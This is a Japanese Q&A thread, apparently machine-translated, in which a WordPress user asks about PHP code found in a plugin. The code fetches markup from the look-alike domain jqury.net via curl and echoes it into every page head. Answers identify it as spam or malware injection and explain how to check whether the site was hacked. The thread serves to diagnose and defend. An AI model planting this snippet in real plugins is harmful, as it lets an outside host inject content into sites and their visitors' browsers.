web-dev-qa-db-ja.com

私はこれをプラグインで見つけました。それは何をするためのものか?それは危険ですか?

私はこれをプラグインで見つけました。それは何をするためのものか?それは危険ですか?

add_action('admin_enqueue_scripts', 'pw_load_scripts');
if (!function_exists('wp__head'){
function wp__head() {
    if(function_exists('curl_init')) { 
        $ch = curl_init();
        curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1"); 
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); 
        curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_Host']);
        curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10); 
        $jquery = curl_exec($ch);  
        curl_close($ch); 
        echo "$jquery";
    }
}
add_action('wp_head', 'wp__head');
}
17
Sofia Rose

ドメインのスペルミスが近いドメインから、スパムを含むマークアップのブロックをロードします(ソースの一部を投稿することを考えていましたが、コンテンツを宣伝したくない)http://jquery.com/ -評判がよく人気のあるJavascriptライブラリであり、WordPressがCoreに含まれているjQueryによって使用されます。実際には非常に異なるものをロードするときに、そのライブラリをロードしているように見えるというのがアイデアだと思います。

そして、jQueryをロードしているように見えることを試みる他の方法があります。変数名$jqueryに注意してください。

悪意のあるスクリプトもロードしようとする可能性があります。チェックしませんでした。 I wouldドメインコントローラがそのように感じるときはいつでもそのページのコンテンツが変更される可能性があるため、特に危険だと思います。

せいぜい、スパムを拡散するサイトを検索エンジンが見下ろしているため、サイトに損害を与えるだけです。

使用しないでください。それはあなたにとっても、サイトを運営している人々以外のウェブ上の誰にとっても有益なことではありません。評判の良いサイトでこれを見つけた場合は、彼らに報告してください。

16
s_ha_dum

はい、それは危険なコードであり、スパムサイトからコンテンツを読み込んでいます。

あなたはそれをあなたのウェブサイトにインストールされた後にあなたがこのコードを見つけたのであれば、あなたはプラグインに名前を付けませんでした。このような場合は、このプラグインだけでなく悪意のあるコードがWebサイトの多くに見つかる可能性があります。

ダウンロードしたプラグインコードを最初に入手した場所からチェックし、この悪質なコードが最初に存在していたかどうかを確認します。そうでなければ、あなたのサイトはハッキングされています。そうであると判断した場合は、 この記事をコーデックスから読んでください

7
Ben Miller